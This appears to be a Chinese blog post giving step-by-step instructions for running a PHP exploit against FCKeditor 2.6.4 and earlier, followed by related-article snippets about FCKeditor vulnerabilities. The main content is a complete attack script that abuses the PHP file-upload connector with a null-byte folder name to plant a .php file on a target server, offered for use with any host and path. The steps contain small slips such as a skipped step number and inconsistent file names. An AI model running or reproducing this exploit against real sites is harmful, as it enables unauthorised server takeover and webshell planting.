fck.php,fckphp版本exp使用办法详情

最新推荐文章于 2023-03-22 14:08:17 发布
最新推荐文章于 2023-03-22 14:08:17 发布
阅读量132 收藏
点赞数
文章标签: fck.php

fckphp版本exp使用办法详情

1.找到php.exe的路径,在这里面需要借助这个exe和php5ts.dll去远程的提交php。

2.当前目录创建一个cmd.bat然后编辑内容cdm.exe。

3.新建一个php文件,例如命名为:fck623.php,然吧exp复制到这个php文件中。保存。

5.双击新建的cmd.bat然后输入php.exe fck623.php。

19f235b37e902f50fcc60afe450d9b9a.png

返回的使用办法就是php+地址+路径:php.exe fck263.php 127.0.0.1 /test/fckeditor。

5e08bc7c80e99a76eda05933f6a6ed77.png

执行完这些访问是否有新的文件生成,链接即可。

使用条件:php版本、小于2.6.4的可以直接提交生成。

exp:(php开始标签记得自己加上)

error_reporting(0);

set_time_limit(0);

ini_set("default_socket_timeout", 5);

define(STDIN, fopen("php://stdin", "r"));

$match = array();

function http_send($host, $packet)

{

$sock = fsockopen($host, 80);

while (!$sock)

{

print "\n[-] No response from {$host}:80 Trying again...";

$sock = fsockopen($host, 80);

}

fputs($sock, $packet);

while (!feof($sock)) $resp .= fread($sock, 1024);

fclose($sock);

print $resp;

return $resp;

}

function connector_response($html)

{

global $match;

return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));

}

print "\n+------------------------------------------------------------------+";

print "\n| FCKEditor Servelet Arbitrary File Upload Exploit |";

print "\n+------------------------------------------------------------------+\n";

if ($argc < 3)

{

print "\nUsage......: php $argv[0] host path\n";

print "\nExample....: php $argv[0] localhost /\n";

print "\nExample....: php $argv[0] localhost /FCKEditor/\n";

die();

}

$host = $argv[1];

$path = ereg_replace("(/){2,}", "/", $argv[2]);

$filename = "fvck.gif";

$foldername = "fuck.php%00.gif";

$connector = "editor/filemanager/connectors/php/connector.php";

$payload = "-----------------------------265001916915724\r\n";

$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";

$payload .= "Content-Type: image/jpeg\r\n\r\n";

$payload .= 'GIF89a'."\r\n".''."\n";

$payload .= "-----------------------------265001916915724--\r\n";

$packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";//print $packet;

$packet .= "Host: {$host}\r\n";

$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";

$packet .= "Content-Length: ".strlen($payload)."\r\n";

$packet .= "Connection: close\r\n\r\n";

$packet .= $payload;

print $packet;

if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");

else print "\n[-] Job done! try http://${host}/$match[2] \n";

?>

d19ea832087fee53daebc718aebada2f.png

版权声明:除非特别标注,否则均为本站原创文章,转载时请以链接形式注明文章出处。

weixin_39898854
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
fckeditor <= 2.6.4 任意文件上传漏洞
weixin_30640291的博客
01-06 985
<?error_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));$match = array();function http_send($host, $packet){$sock = fsockopen($host, 80)...
fck.php,将FCKeditor导入PHP+SMARTY的实现方法
weixin_34079825的博客
03-24 63
这篇文章主要介绍了将FCKeditor导入PHP+SMARTY的实现方法,涉及整合FCKeditor与SMARTY的技巧,非常具有实用价值,需要的朋友可以参考下本文实例讲述了将FCKeditor导入PHP+SMARTY的实现方法。分享给大家供大家参考。具体分析如下:提取Fckeditor时,采用如下,PHP用$_POST['p_info']得到FCKeditor的值.补充:1 .此处basepat...
FCKeditor漏洞总结 经常被挂马的网站请注意(转)
b9264826的博客
11-05 498
FCKeditor介绍FCKeditor是一款功能强大的开源在线文本编辑器(DHTML editor),它使你在web上可以使用类似微软Word 的桌面文本编辑器的许多强大功能。它是轻量级且不必在客户端进行任何方式的安装。 FCKeditor兼容Firefox, Mozilla, Netscape 和IE。FCKeditor官司方网址:http://www.fckeditor.net/F...
<小迪安全>23-文件上传之解析漏洞编译器安全
hackerXxxt的博客
03-22 170
利用场景: 我们可以利用文件上传,上传一个不识别的文件后缀(x.php. xxx.yyy),apache 识别不了最后的yyy, 向前解析直到识别,利用解析漏洞规则成功解析文件,随后后门代码被触发。第一步:看中间件,确立是否存在解析漏洞/CMS/编辑器漏洞/CVE。字典扫描:扫描会员中心,文件上传的位置。Apache配置安全--vuthub。Apache换行解析-vulhub。IIS6/ 7简要说明-本地搭建。Nginx解析漏洞-vulhub。Apache 低版本解析漏洞。ueditor 漏洞利用
Fckeditor漏洞利用全面解析
weixin_34413802的博客
06-27 520
第一步:查看编辑器版本 FCKeditor/_whatsnew.html ————————————————————————————— 第二步. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破!测试通过。 ————————————————————————————— 第三步.Version <=2.4.2 For php ...
fck.rar_fck
09-24
标题中的"fck.rar_fck"可能指的是FCKeditor的一个压缩包文件,其中包含了该编辑器的相关资源和代码。 FCKeditor的主要特点包括: 1. **跨浏览器兼容性**:FCKeditor支持多种主流浏览器,如Internet Explorer、Fire...
FCK 使用指南.doc
11-11
FCK 使用指南 里面教你一步一步完成fck的配置,清晰明了,聪明的你一看就会!
PHP集成FCK的函数代码
10-30
定义一个函数用于调用FCKeditor ,用php写成一个函数,方便调用
fck编辑器的使用.rar
09-17
这个“fck编辑器的使用.rar”压缩包可能包含了关于如何安装、配置以及使用FCKeditor的详细资料。 FCKeditor的特点和功能包括: 1. **多平台支持**:FCKeditor可以在多种操作系统和浏览器环境下运行,包括Windows、...
fck.jar|fck.jar|
04-01
slf4j-simple-1.5.2.jar|slf4j-api-1.5.2.jar|fckeditor-java-core-2.4.1.jar|commons-io-1.3.2.jar|commons-fileupload-1.2.1.jar
FCKeditor漏洞所有利用页面
xianghao欢迎你的光临a
03-09 1万+
FCKeditor漏洞多的要命,一堆堆的网站因为这种洞而牺牲了。 1. 查看编辑器版本 FCKeditor/_whatsnew.html ———————————————————————————————— 2. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破 测试通过。 3.Version Upload a new file: ————————————
文件上传之解析漏洞编辑器
weixin_44532761的博客
12-03 151
小迪 https://www.bilibili.com/video/BV1JZ4y1c7ro?p=22 1.几种中间件解析漏洞演示-IIS,Apache,Nginx 搭建iis服务器 http://www.360doc.com/content/19/0523/18/2238056_837752033.shtml Apache低版本解析漏洞 phpstudy默认的是2.x 我这报500 Apache 换行解析x0a-vulhub https://vulhub.org/#/environme
目前接触过的编辑器漏洞(FCKeditor,Ewebeditor)
weixin_43071873的博客
10-12 613
1. FCKeditor 编辑器页面 FCKeditor/_samples/default.html FCKeditor/_samples/asp/sample01.asp FCKeditor/_samples/asp/sample02.asp FCKeditor/_samples/asp/sample03.asp FCKeditor/_samples/asp/sample04.asp fckeditor/editor/filemanager/connectors/test.html 查看编辑器版本 将ur
FCKeditor 2.6.4 php版本任意文件上传——漏洞复现
W小哥
06-17 7431
一、漏洞描述 FCKeditor是目前最优秀的可见即可得网页编辑器之一,它采用JavaScript编写。具备功能强大、配置容易、跨浏览器、支持多种编程语言、开源等特点。它非常流行,互联网上很容易找到相关技术文档,国内许多Web项目和大型网站均采用了FCKeditor。 Fckeditor 低于 2.6.4 php 版本任意文件上传漏洞,当您的PHP环境配置为 GPC = Off 时可绕过currentfolder参数过滤上传脚本木马控制网站服务器 二、漏洞原理 漏洞版本:<=2.6.4 三、环境搭建
fckeditor的一次渗透测试
看不尽的尘埃——博客
11-19 1022
以前微信公众号的文章,由于要改版了,在CSND上备份下。 前言 今天目标是研究一下fckeditor编辑器的漏洞,寻找一些在防御上的思路。自己本地用Windows 2003 server 搭建fckeditor 编辑器,版本是2.6.3的,但是通过网上的一些资料发现列目录的漏洞在我搭建的环境中没效果,于是我尝试在网上搜索一些教育行业有fckeditor编辑器组件的网站。不幸的是,寻找到的URL...
Fckeditor漏洞利用方法总结
oceanark的博客
07-13 5810
1.查看编辑器版本 FCKeditor/_whatsnew.html —————————————————————————————————————— 2. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破!测试通过。 —————————————————————————————————————— 3.Version action=”ht
fckeditor 图片上传 java_FCKeditor编辑器添加图片上传功能及图片路径问题解决方法...
weixin_35618196的博客
02-23 231
现在很多CMS系统因为安全原因会把后台编辑器里的上传功能给去除,但这样一来对实际使用过程造成了很多麻烦,今天我们以ASPCMS系统的FCKeditor编辑器为例,说明一下如何增加图片上传功能。1. 打开网站后台编辑器里的admin/editor/fckconfig.js这个文件找到FCKConfig.ImageUpload = false 这句,把false改成true就行啦。FCKConfig....
【渗透测试】--- FCKeditor文本编辑器漏洞
热门推荐
qq_43168364的博客
12-25 1万+
一、FCKeditor编辑器漏洞 FCKeditor编辑器是一款强大的所见即所得文本编辑器,现在已经更名为:CKEditor fckeditor的常见敏感目录(FCK有时要小写) (1) 查看版本信息 /FCKeditor/editor/dialog/fck_about.html /FCKeditor/_whatsnew.html (2) 默认上传页面 /FCKeditor/editor/filemanager/browser/default/browser.html /FCKeditor/edito
解释一下FCK:editor标签
最新发布
03-30
FCKeditor是一款基于Web的富文本编辑器,它允许用户在网页中创建和编辑内容,具有...FCKeditor标签使用简单,只需要在HTML代码中插入相应的标记即可引入编辑器,同时支持多种语言和扩展插件,可以满足不同用户的需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值